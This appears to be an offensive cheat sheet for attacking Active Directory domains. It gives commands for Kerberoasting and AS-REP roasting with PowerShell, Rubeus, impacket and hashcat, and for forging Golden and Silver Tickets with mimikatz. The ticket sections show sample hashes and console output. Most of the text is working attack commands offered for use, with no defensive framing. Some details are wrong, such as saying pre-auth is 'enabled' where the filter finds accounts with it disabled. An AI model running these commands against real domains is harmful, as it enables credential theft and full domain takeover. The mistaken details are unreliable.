Relationships and Attack paths
We can use bloodhound to find hidden relationships and attack paths in an Active Directory environment.
From the data collect we can escalate our privilege to the target, or use tools like aclpwn.
Kerberoasting
The AD Powershell module can be used to search for users with SPN
Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" | Format-Table Name, DistinguishedNam
|
Using Nmap:
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
Using Rubeus to gain hashes:
Rubeus.exe kerberoast /outfile:hashes.txt
Use the hashcat -m 13100 (Kerberos 5 TGS-REP etype 23) to crack:
hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt
Using impacket:
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
https://newerasec.com/kerberoasting/
AS-RES
Find users with pre-auth enabled using the AD Powershell module :
Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
To exploit run:
.\Rubeus.exe asreproast
Impacket:
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
https://newerasec.com/as-roast/
Golden Ticket
Once you gained the krbtgt hash (from dcsync or DC compromise)T
The Mimikatz kerberos::golden module handles Golden Tickets
We need the following parameters:
/domain - name of the domain
/sid - the sid of the domain (can be obtain from 'whoami /user' , remember to remove the RID)
/rc4 - the NTLM hash of krbtgt
/user - the user you want to create the new TGT ticket for
/id - the RIF of that user you looking to create ticket for
/ptt - (Optional) inject the new ticket into the current session, if not applied the ticket will be saved to a file
mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500 /ptt
User : Administrator
Domain : eth.lab (ETH)
SID : S-1-5-21-98033113-2199257571-2188946577
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt
Lifetime : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session
Silver Ticket
use the 'kerberos::golden' module to forge TGS, we will need to pass the following parameters:
/sid: The SID (Security Identifier) of the Domain (whoami /user)
/user: Target Account/Computer to Impersonate
/id: RID of the account you will be impersonating
/ptt: Optional ( will automatically inject the ticket into the current session)
/rc4: NTLM Hash of User Password/Computer Password
/service: the service we want to access
Example:
mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator
User : Administrator
Domain : eth.lab (ETH)
SID : S-1-5-21-98033113-2199257571-2188946577-500
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Service : cifs
Target : WIN-EU4DLP9KRRC.eth.lab
Lifetime : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session
